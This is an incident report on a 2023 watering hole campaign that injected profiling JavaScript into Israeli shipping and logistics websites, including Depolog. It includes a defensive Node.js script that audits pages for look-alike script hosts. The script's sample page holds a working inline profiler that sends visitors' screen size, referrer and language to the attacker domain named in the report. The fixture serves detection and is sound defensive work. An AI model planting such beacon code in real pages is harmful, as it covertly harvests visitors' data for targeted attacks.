
Cyber Incident Victim: Depolog

Date:

Apr 2023

Location:

Israel

Summary

A suspected Iranian threat group targeted Israeli shipping and logistics firms, including Depolog, using a watering hole attack. The attackers compromised websites to inject malicious JavaScript that harvested visitors' technical data, such as IP addresses and screen resolution. This information was likely collected to profile users for future, customized attacks. The campaign was attributed with low confidence to the known Iranian group Tortoiseshell, which has a history of employing such tactics.

Description

On or around April 18, 2023, a cybersecurity incident targeting Israeli shipping and logistics companies was identified and reported by the Tel Aviv-based cybersecurity firm ClearSky. The incident involved a watering hole attack campaign in which at least eight Israeli websites were compromised. Among the specifically named targeted entities were the shipping company SNY Cargo, the logistics firm Depolog, and the restaurant equipment supplier SZM. The threat actors behind this activity were attributed with low confidence to the Iranian nation-state group known as Tortoiseshell, which is also tracked as TA456 and Imperial Kitten. This group has been documented as active since at least July 2018.

The attack methodology centered on compromising websites that the intended targets were likely to visit, a tactic known as a watering hole attack. In this campaign, the attackers injected malicious JavaScript into the compromised websites. The primary function of this code was information gathering. When a user visited one of the infected sites, the script activated and recorded data about the visitor: the IP address, the screen resolution, and the URL of the page visited immediately before landing on the compromised site (the HTTP referrer). The attackers also sought to determine the visitor's browser language preference, an action likely intended to facilitate the customization of future attacks against those specific users.

The majority of the websites that were compromised in this campaign were utilizing the uPress hosting service. This particular hosting provider had previously been targeted in 2020 by another Iranian threat group, Emennet Pasargad, in an attack that resulted in the defacement of thousands of Israeli websites. In the 2023 incident, the attackers used the domain jquery-stack[.]online to host and deliver their malicious payload. This domain was designed to impersonate the legitimate and widely used JavaScript framework jQuery, a deception tactic aimed at avoiding detection by anyone who might inspect the website's source code. This specific domain had been previously attributed to the Tortoiseshell group in earlier operations.
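The two markers described above, a script loaded from a jQuery look-alike host and inline code that reads the visitor-profiling fields, can be checked for offline in a saved copy of a page. The following Node.js script is an added example written for this page; it is not code from ClearSky, uPress or any affected site. The allowlist of legitimate jQuery hosts, the page origin and the sample HTML are assumptions constructed for the demonstration.

```javascript
// Added example (not ClearSky's or the affected sites' code): audit the
// <script> tags of a saved page for two markers of the campaign described
// above, a jQuery look-alike script host such as jquery-stack[.]online and
// inline code that reads the profiling fields the report lists.
// Node.js >= 18, no dependencies. Allowlist and sample page are assumptions.

// Hosts that legitimately serve jQuery (assumed allowlist; extend per site).
const LEGIT_JQUERY_HOSTS = new Set([
  'code.jquery.com',
  'ajax.googleapis.com',
  'cdnjs.cloudflare.com',
  'cdn.jsdelivr.net',
]);

// Browser properties an injected script reads to profile visitors. The IP
// address is deliberately absent: the attacker's server observes it when the
// script is fetched, so it leaves no trace in the page source.
const FINGERPRINT_MARKERS = [
  'screen.width', 'screen.height', 'document.referrer', 'navigator.language',
];

// Extract every src attribute from <script> tags. A regex is adequate for an
// offline audit of static HTML; use a real HTML parser for anything else.
function extractScriptSrcs(html) {
  const re = /<script\b[^>]*\bsrc\s*=\s*(["']?)([^"'\s>]+)\1/gi;
  const srcs = [];
  let m;
  while ((m = re.exec(html)) !== null) srcs.push(m[2]);
  return srcs;
}

// Classify each script by host: same-origin, allowlisted CDN, jQuery
// look-alike (name contains "jquery" but the host is not one that really
// serves it), or some other external host that deserves a look.
function auditScriptHosts(html, pageUrl) {
  const pageHost = new URL(pageUrl).hostname.toLowerCase();
  return extractScriptSrcs(html).map((src) => {
    let host;
    try {
      // Relative and protocol-relative srcs resolve against the page URL.
      host = new URL(src, pageUrl).hostname.toLowerCase();
    } catch {
      return { src, host: null, verdict: 'unparseable' };
    }
    let verdict;
    if (host === pageHost) verdict = 'same-origin';
    else if (LEGIT_JQUERY_HOSTS.has(host)) verdict = 'allowlisted';
    else if (host.includes('jquery')) verdict = 'jquery-lookalike';
    else verdict = 'external-unlisted';
    return { src, host, verdict };
  });
}

// Flag inline scripts (no src attribute) that touch two or more profiling
// fields. This is a heuristic: ordinary analytics code reads some of them too.
function findInlineProfilers(html) {
  const re = /<script\b(?![^>]*\bsrc\s*=)[^>]*>([\s\S]*?)<\/script>/gi;
  const hits = [];
  let m;
  while ((m = re.exec(html)) !== null) {
    const body = m[1];
    const markers = FINGERPRINT_MARKERS.filter((k) => body.includes(k));
    if (markers.length >= 2) hits.push({ markers, snippet: body.trim().slice(0, 80) });
  }
  return hits;
}

// Constructed sample page, not captured from any compromised site. It mixes a
// first-party script, the real jQuery CDN, the look-alike host named in the
// report, an unrelated third party, and an inline profiler that beacons out.
const SAMPLE_PAGE_URL = 'https://www.example.co.il/';
const SAMPLE_HTML = `
<html><head>
<script src="/js/site.js"></script>
<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
<script src='https://jquery-stack.online/jquery.min.js'></script>
<script src="//cdn.example-analytics.net/tag.js"></script>
<script>
  var p = { w: screen.width, h: screen.height, r: document.referrer, l: navigator.language };
  new Image().src = 'https://jquery-stack.online/c?d=' + encodeURIComponent(JSON.stringify(p));
</script>
</head><body></body></html>`;

function runAudit() {
  return {
    hosts: auditScriptHosts(SAMPLE_HTML, SAMPLE_PAGE_URL),
    inline: findInlineProfilers(SAMPLE_HTML),
  };
}

console.log(JSON.stringify(runAudit(), null, 2));
```

Run it with `node audit.js` against the embedded sample, or replace `SAMPLE_HTML` with the saved source of a page under review. The host check is the more reliable of the two: a script host that merely resembles a framework name is a strong indicator, whereas the inline check only narrows down which scripts to read by hand.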

The malicious code was deployed to gather intelligence on visitors to these sites. The exfiltrated data gave the attackers a profile of the users that could be used for subsequent, more targeted operations. The use of watering hole attacks by Iranian state-sponsored actors has an established history; ClearSky researchers noted that Iranian hackers have employed this method since 2017. For example, in the previous year, a separate suspected Iranian threat actor tracked by Mandiant as UNC3890 used a similar watering hole technique to target organizations across the shipping, healthcare, government, and energy sectors in Israel.

By April 18, 2023, most of the compromised websites had been cleared of the malicious code, indicating that a remediation and containment effort had been successfully undertaken. The report from ClearSky did not specify which entities were responsible for this cleanup, though it typically involves the affected website owners and their hosting providers. The immediate impact of the incident was the confirmed loss of user data from the visitors to the sites during the period they were compromised. The potential consequences of such data collection include an increased risk of highly targeted spear-phishing campaigns or other tailored attacks against the individuals whose information was stolen, particularly if they were employees of the targeted shipping and logistics sector.

The incident is situated within the broader context of ongoing cyber tensions between Iran and Israel. The two nations frequently engage in cyber operations against one another, driven by longstanding political animosity. Iranian state-sponsored attacks against Israeli interests vary in objective, ranging from data theft and espionage to system destruction and disinformation campaigns. According to Microsoft, while these Iranian actors are generally assessed to be less advanced than their Russian or Chinese counterparts, they have been actively enhancing their capabilities. A notable aspect of their evolving tactics is the rapid exploitation of newly disclosed software vulnerabilities to breach organizations and the use of tailored tools against specific targets.

The Tortoiseshell group itself has a history of employing diverse methods. Prior to this watering hole campaign, the group was known to have used both custom-made and commercially available off-the-shelf malware. In a previous operation, they executed a supply chain attack targeting IT providers in Saudi Arabia. The strategic goal of that campaign was to ultimately compromise the customers of those IT providers, demonstrating a pattern of targeting intermediaries to reach a broader set of victims. The 2023 attack on Depolog and other Israeli companies represents a continuation of this group's focus on the logistics and supply chain sector, albeit through a different initial attack vector. The re-use of a known malicious domain tied to their past operations provided a key piece of evidence for the low-confidence attribution to the group. The incident underscores the persistent threat posed by watering hole attacks as an effective means for threat actors to gather intelligence on a specific user base without needing to directly breach the victims' own networks.
